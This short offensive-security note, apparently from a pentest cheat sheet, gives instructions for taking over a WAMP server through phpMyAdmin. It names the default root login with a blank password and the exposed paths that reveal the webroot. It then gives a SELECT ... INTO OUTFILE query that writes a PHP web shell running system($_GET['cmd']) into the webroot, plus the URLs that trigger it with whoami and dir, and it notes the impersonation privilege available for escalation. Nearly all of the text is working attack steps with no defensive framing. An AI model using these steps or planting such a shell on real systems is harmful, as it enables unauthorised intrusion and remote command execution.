phpMyAdmin often provides direct MySQL access through a web UI. If default credentials work and MySQL can write to the webroot, use INTO OUTFILE to create a webshell.
Try root with a blank password:
Username: root
Password:Useful exposed WAMP paths:
http://TARGET:8080/phpmyadmin/
http://TARGET:8080/add_vhost.php?lang=englishadd_vhost.php can reveal that the webroot is C:\wamp\www.
If phpMyAdmin accepts root with a blank password, check file-write restrictions and write a PHP shell to the WAMP webroot:
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'datadir';
SHOW VARIABLES LIKE 'basedir';
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\wamp\\www\\shell.php";Trigger the shell:
Successful execution may run as nt authority\local service with SeImpersonatePrivilege enabled.
Last updated
http://TARGET:8080/shell.php?cmd=dir
http://TARGET:8080/shell.php?cmd=whoami /all